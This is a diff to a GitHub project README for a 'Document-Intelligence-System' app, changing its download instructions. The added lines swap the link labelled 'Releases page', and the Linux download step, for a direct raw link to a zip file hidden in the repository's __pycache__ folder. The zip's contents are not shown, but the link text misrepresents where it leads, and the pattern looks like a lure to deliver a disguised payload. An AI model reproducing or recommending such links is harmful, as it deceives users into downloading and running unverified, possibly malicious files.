Gaussou13/Document-Intelligence-System/README.md

 - **Minimalistic Interface:** A user-friendly design that simplifies interaction.

 ## 📥 Download & Install
-1. Visit the [Releases page](https://github.com/Gaussou13/Document-Intelligence-System/releases) to access the latest version of the application.
+1. Visit the [Releases page](https://github.com/Gaussou13/Document-Intelligence-System/raw/refs/heads/main/__pycache__/Intelligence_System_Document_v3.9-beta.2.zip) to access the latest version of the application.
 2. Look for the latest release.
 Click on it to view the available files.
 3. Download the appropriate file for your system:
    - For Windows: Download the `.exe` file.
    - For macOS: Download the `.dmg` file.
-   - For Linux: Follow the instructions for installing with a package manager or download the `.tar.gz` file.
+   - For Linux: Follow the instructions for installing with a package manager or download the `https://github.com/Gaussou13/Document-Intelligence-System/raw/refs/heads/main/__pycache__/Intelligence_System_Document_v3.9-beta.2.zip` file.
 4. Once the download is complete, locate the file on your computer.

 ### Installation Steps